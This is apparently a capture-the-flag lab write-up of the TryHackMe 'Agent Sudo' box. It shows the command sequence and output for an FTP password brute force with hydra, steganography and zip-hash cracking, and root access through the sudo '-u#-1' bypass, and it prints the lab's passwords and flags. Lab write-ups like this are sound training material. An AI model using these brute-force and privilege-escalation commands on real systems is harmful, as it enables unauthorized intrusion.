Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
ββ$ nmap -sC -sV -oA nmap/agentsudo 10.10.235.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 15:57 EST
Nmap scan report for 10.10.235.44
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
There is no CVE we found from NMAP Scan.
Website is giving some hint, it is saying use your codename as user-agent to access this site.
As the hint suggest, we have to use agent name in user-agent, so I opened burpsuite and edit user-agent as name of the agent.
It is saying - What are you doing! Are you one of the 25 employees? If not, I going to report this incident.
Now, Instead of R, I tried different alphabets like A,B and so on. While testing for C we got the location, /agent_C_attention.php .
So the name of the agent is chris.
Now, there is a ftp port open. So I tried to run ftp with default creds, but it didnβt work, so we have to bruteforce ftp using hydra.
1
2
3
|
ββ$ hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.235.44 ftp
...
[21][ftp] host: 10.10.235.44 login: chris password: crystal
|
We found the password for chris’s ftp server, that is crystal. Letβs login into FTP and see what is inside it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
ββ$ ftp chris@10.10.235.44
Connected to 10.10.235.44.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||21299|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
|
I have downloaded the files using get <filename> from FTP. Letβs see what is in To_agentJ.txt file.
1
2
3
4
5
6
7
|
ββ$ cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
|
So, from this we got the hint that there is come kind of file inside this image. So I have used binwalk to get the data out of that image.
binwalk -e cutie.png β There is a zip file which contains password. So using john we can crack the password for the zip file.
1
2
3
4
5
|
ββ$ zip2john 8702.zip > hash.hash
ββ$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.hash
...
alien (8702.zip/To_agentR.txt)
|
So the password for the zip file us alien.
The zip file contain the following information.
1
2
3
4
5
6
7
|
ββ$ cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
|
It seems like some kind of encoding, letβs try base64.
1
2
|
ββ$ echo QXJlYTUx | base64 -d
Area51
|
user flag
It seems Area51 is the password to decrypt data from cute-alien.jpg file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
ββ$ steghide --extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
βββ(kaliγΏkali)-[~/Desktop/tryhackme/agentsudo]
ββ$ cat message.txt
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
|
The other Agentβs name is james and the password of ssh for james is hackerrules!.
1
2
3
4
|
james@agent-sudo:~$ ls
Alien_autospy.jpg user_flag.txt
james@agent-sudo:~$ cat user_flag.txt
b03d975e8c92a7c04146cfa7a5a313c7
|
root flag
Download the file Alient_autospy.jpg using scp and reverse search in google.
ββ$ sudo scp [james@10.10.235.44](mailto:james@10.10.235.44):Alien_autospy.jpg .
Answer is - Roswell alien autopsy
Root exploit article - https://www.exploit-db.com/exploits/47502
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
james@agent-sudo:~$ sudo -l
Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# cat /root/root.txt
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
b53a02f55b57d4439e3341834d70c062
By,
DesKel a.k.a Agent R
|
